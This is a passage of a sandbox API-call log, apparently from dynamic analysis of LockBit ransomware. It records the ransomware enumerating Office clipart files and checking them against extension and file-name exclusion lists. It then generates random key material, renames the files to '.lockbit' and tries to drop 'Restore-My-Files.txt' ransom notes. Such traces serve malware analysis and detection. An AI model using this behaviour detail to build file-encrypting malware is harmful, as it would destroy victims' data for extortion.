nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.317] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.317] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.318] free (_Block=0x1fa2ed8) [0166.318] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.318] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.318] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d021f00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d021f00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x47ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00052_.WMF", cAlternateFileName="")) returned 1 [0166.318] lstrcmpiW (lpString1=".", lpString2="PE00052_.WMF") returned -1 [0166.319] lstrcmpiW (lpString1="..", lpString2="PE00052_.WMF") returned -1 [0166.319] PathFindExtensionW (pszPath="PE00052_.WMF") returned=".WMF" [0166.319] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.319] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.320] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00052_.WMF") returned 1 [0166.320] lstrcmpiW (lpString1="ntldr", lpString2="PE00052_.WMF") returned -1 [0166.320] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00052_.WMF") returned -1 [0166.320] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00052_.WMF") returned -1 [0166.320] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00052_.WMF") returned -1 [0166.320] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00052_.WMF") returned 1 [0166.320] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00052_.WMF") returned -1 [0166.320] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.320] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF") returned=".WMF" [0166.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.320] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.321] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.321] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF.lockbit") returned 72 [0166.321] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00052_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.322] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.323] malloc (_Size=0x40068) returned 0x3df0008 [0166.323] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18412) returned 1 [0166.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.324] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.328] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.328] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.328] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0166.329] free (_Block=0x1fa2ed8) [0166.329] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.329] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.329] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.329] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00231_.WMF", cAlternateFileName="")) returned 1 [0166.329] lstrcmpiW (lpString1=".", lpString2="PE00231_.WMF") returned -1 [0166.329] lstrcmpiW (lpString1="..", lpString2="PE00231_.WMF") returned -1 [0166.329] PathFindExtensionW (pszPath="PE00231_.WMF") returned=".WMF" [0166.329] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.329] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.330] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.330] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00231_.WMF") returned 1 [0166.331] lstrcmpiW (lpString1="ntldr", lpString2="PE00231_.WMF") returned -1 [0166.331] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00231_.WMF") returned -1 [0166.331] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00231_.WMF") returned -1 [0166.331] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00231_.WMF") returned -1 [0166.331] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00231_.WMF") returned 1 [0166.331] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00231_.WMF") returned -1 [0166.331] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.331] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF") returned=".WMF" [0166.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.331] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.331] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.332] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.332] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF.lockbit") returned 72 [0166.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00231_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.333] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.333] malloc (_Size=0x40068) returned 0x3df0008 [0166.333] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2228) returned 1 [0166.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.334] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.338] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.338] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.339] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.340] free (_Block=0x1fa2ed8) [0166.340] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00231_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.340] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.340] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.340] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00272_.WMF", cAlternateFileName="")) returned 1 [0166.340] lstrcmpiW (lpString1=".", lpString2="PE00272_.WMF") returned -1 [0166.340] lstrcmpiW (lpString1="..", lpString2="PE00272_.WMF") returned -1 [0166.340] PathFindExtensionW (pszPath="PE00272_.WMF") returned=".WMF" [0166.341] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.341] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.342] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.342] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00272_.WMF") returned 1 [0166.343] lstrcmpiW (lpString1="ntldr", lpString2="PE00272_.WMF") returned -1 [0166.343] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00272_.WMF") returned -1 [0166.343] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00272_.WMF") returned -1 [0166.343] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00272_.WMF") returned -1 [0166.343] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00272_.WMF") returned 1 [0166.343] lstrcmpiW (lpString1="iconcache.db", 